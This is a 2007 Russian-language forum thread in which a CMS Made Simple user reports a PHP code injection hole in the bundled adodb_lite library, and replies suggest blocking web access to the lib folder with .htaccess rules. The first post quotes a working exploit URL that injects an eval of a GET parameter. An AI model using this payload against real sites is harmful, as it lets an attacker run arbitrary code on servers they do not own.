Page 1 of 1
Warning !
Posted: Tue Oct 09, 2007 10:49 am
by net0
Использую cmsmadesimple на многих сайтах.
Давеча получил по аське от доброго человека сообщение:
"Привет,
http://www.мой_сайт.ru//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
дыра позволяет выполнить любой php код"
Похоже на пхп-инъекцию. Проверил - работает.
![Sad :(](./images/smilies/sad.gif)
Re: Warning !
Posted: Tue Oct 09, 2007 4:52 pm
by ZYV
Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Re: Warning !
Posted: Wed Oct 31, 2007 3:23 pm
by MASSER
ZYV wrote:
Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Imho, было бы правильней, если бы разработчики его туда сами поместили. А то, мало ли какие грабли потом вылезут.
Re: Warning !
Posted: Thu Nov 01, 2007 3:35 pm
by ilia3d
ZYV wrote:
Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Т.е. просто создать файлик с этой строчкой "deny from all"?
Re: Warning !
Posted: Wed Nov 07, 2007 10:38 pm
by ZYV
Да, я согласен, но у меня не было времени побеседовать с Тедом на тему безопасности. Очень с ним вообще тяжело в последнее время (временем).
Нет, Илья, если просто кинешь - нарушишь работу некоторых функций (увидишь сам). Я кладу что-то в стиле
order allow,deny
deny from all
Но, конечно, во-первых, список может быть расширен, во-вторых, во все папки где доступ не нужен вообще типа plug-ins - просто deny from all для всех. Кстати, сильно помогает
![wink ;-)](./images/smilies/wink.gif)
против лошков. Но я вообще в этом плане параноик - у меня mod_security & ids'ы везде крутятся... На всякий.